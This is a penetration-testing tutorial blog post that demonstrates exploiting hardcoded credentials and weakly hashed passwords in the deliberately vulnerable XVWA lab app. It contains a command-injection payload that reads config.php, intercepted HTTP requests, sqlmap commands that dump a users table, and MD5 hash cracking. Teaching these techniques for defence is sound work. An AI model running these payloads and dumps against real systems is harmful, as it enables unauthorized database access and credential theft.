Cryptography

How To Exploit Credential Management Vulnerabilities

Srinivas
December 1, 2020 by
Srinivas

Introduction

In the previous article, we discussed some examples of poor credential management. Hardcoded credentials, improper error handling and insecure data storage in the database are some of the examples we discussed. This article discusses some examples of how these poor credential management practices can be exploited by chaining with other vulnerabilities in web applications. 

Learn Applied Cryptography

Learn Applied Cryptography

Build your applied cryptography and cryptanalysis skills with 13 courses covering hashing, PKI, SSL/TLS, full disk encryption and more.

Exploiting poor credential management

Let us discuss how hard coded database credentials can be exposed when an attacker gains access to the source code, followed by how credentials stored using weak hashing algorithms can be cracked and viewed in clear text.

Accessing hard coded credentials

Applications often contain hardcoded credentials to authenticate to other services such as databases. When an attacker gains access to the source code, these hard coded credentials may be found and abused. Let us see an example of how this may be done through a vulnerable web application. 

We are going to target Xtreme Vulnerable Web Application (XVWA) for this example. Navigate to OS Command Injection, which is a page vulnerable to command injection. Let us enter the following payload into the text box.

ping 127.0.0.1;../../config.php

This looks as follows.

Using command injection, we are attempting to read the file config.php from the server. The request intercepted in Burp proxy looks as follows.

GET /xvwa/vulnerabilities/cmdi/?target=ping+127.0.0.1;../../config.php HTTP/1.1

Host: 192.168.1.105

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.105/xvwa/vulnerabilities/cmdi/

Connection: close

Cookie: PHPSESSID=s009kc6a731sos0p23i3gcfiq7

Upgrade-Insecure-Requests: 1

Send the request to repeater and trigger the request. We should be able to see the following in the HTTP response returned from the server.

</div>

<pre><?php

$XVWA_WEBROOT = "";

$host = "localhost";

$dbname = 'xvwa';

$user = "root";

$pass = "root";

$conn = new mysqli($host,$user,$pass,$dbname);

$conn1 = new PDO("mysql:host=$host;dbname=$dbname", $user, $pass);

$conn1->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

?>

</pre>

<hr>    

</div>

As highlighted, the database credentials are hardcoded in the config file and the credentials are in clear text.  An attacker with access to the internal infrastructure may be able to use these credentials to directly connect to the underlying database.

Credentials hashed using weak algorithms

Use of weak hashing algorithms such as MD5 to store credentials is another commonly seen practice in applications. Let us discuss how one may be able to gain access to these hashed credentials and perform password cracking to obtain clear text passwords.

Once again, we are going to target Xtreme Vulnerable Web Application (XVWA) for this example. Navigate to SQL Injection, which is a page vulnerable to error based SQL Injection. 

Configure a proxy such as Burp,  select an Itemcode as shown in the preceding figure and click Submit. The intercepted request should look as follows.

POST /xvwa/vulnerabilities/sqli/ HTTP/1.1

Host: 192.168.1.105

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.105/xvwa/vulnerabilities/sqli/

Content-Type: application/x-www-form-urlencoded

Content-Length: 14

Connection: close

Cookie: PHPSESSID=s009kc6a731sos0p23i3gcfiq7

Upgrade-Insecure-Requests: 1

item=1&search=

Right click and save the request to a file. In this case, it’s named sqli.txt.

One can exploit this SQL Injection vulnerability to retrieve data stored in the database. Let us use SQLMAP and exploit this.

The following command can be used to retrieve the list of databases available by exploiting the parameter item from the request specified in sqli.txt.

sqlmap -r sqli.txt -p item --dbs

If the exploitation is successful, we should see the list of databases as follows.

xvwa appears to be the only user defined database in the list. Let us choose xvwa and retrieve the tables available in it using the following command.

sqlmap -r sqli.txt -p item -D xvwa --tables

The output should look as follows.

users table looks promising and it may contain sensitive data. So, let us use the following command to extract the columns available in this table.

sqlmap -r sqli.txt -p item -D xvwa -T users --columns

The following figure shows that there is a column named password.

Since the table seems to have column names of our interest, Let us dump the data from it using the following command.

sqlmap -r sqli.txt -p item -D xvwa -T users --columns --dump

If successful, we should see the following output from sqlmap.

As we can observe in the preceding figure, the table contains usernames, but the password column does not contain any clear text data. As an attacker we can find out what type of hashes they are and then attempt to crack using a good dictionary. It should be noted that sqlmap can also assist in cracking these hashes using a dictionary, but we will use john the ripper to do it in this article.

The hashes obtained from sqlmap have been saved in a file called hashes.txt as shown below.

# cat hashes.txt 

admin:21232f297a57a5a743894a0e4a801fc3

xvwa:570992ec4b5ad7a313f5dc8fd0825395

user:25890deab1075e916c06b9e1efc2e25f

To be able to crack these hashes using tools like hashcat or john the ripper, we should know what algorithm is used to generate these hashes. We can identify the algorithm using techniques like length of the hash, but there are tools to assist us too. 

Let us launch a tool called hash-identified in Kali Linux and provide a hash as input as shown below.

Hit enter and we should see the following.

As we can observe in the preceding figure, the hash is possibly of type MD5. Using a good dictionary, we can use John the ripper to crack these hashes. The command to run looks as follows.

As we can observe, John the ripper has cracked the passwords and we can view the cracked passwords using --show flag as shown below.‘

This shows how storing credentials using insecure practices can be dangerous. Determined attackers may be able to access these credentials using other vulnerabilities such as SQL Injection and crack them to retrieve a clear text version of it.

Learn Applied Cryptography

Learn Applied Cryptography

Build your applied cryptography and cryptanalysis skills with 13 courses covering hashing, PKI, SSL/TLS, full disk encryption and more.

Conclusion

Poor credential management may look harmless until an attacker’s presence is uncovered. Several data breaches show that it is extremely important to manage the credentials of both users as well as applications securely.  Developers must be educated to follow secure coding practices and users must be educated to use strong passwords on the internet. In the next few articles, we will discuss some case studies and ways to avoid poor credential management in applications.

 

Sources

  1. https://cwe.mitre.org/data/definitions/312.html
  2. https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password
  3. https://owasp.org/www-community/vulnerabilities/Password_Management_Hardcoded_Password
Srinivas
Srinivas

Srinivas is an Information Security professional with 4 years of industry experience in Web, Mobile and Infrastructure Penetration Testing. He is currently a security researcher at Infosec Institute Inc. He holds Offensive Security Certified Professional(OSCP) Certification. He blogs atwww.androidpentesting.com. Email: srini0x00@gmail.com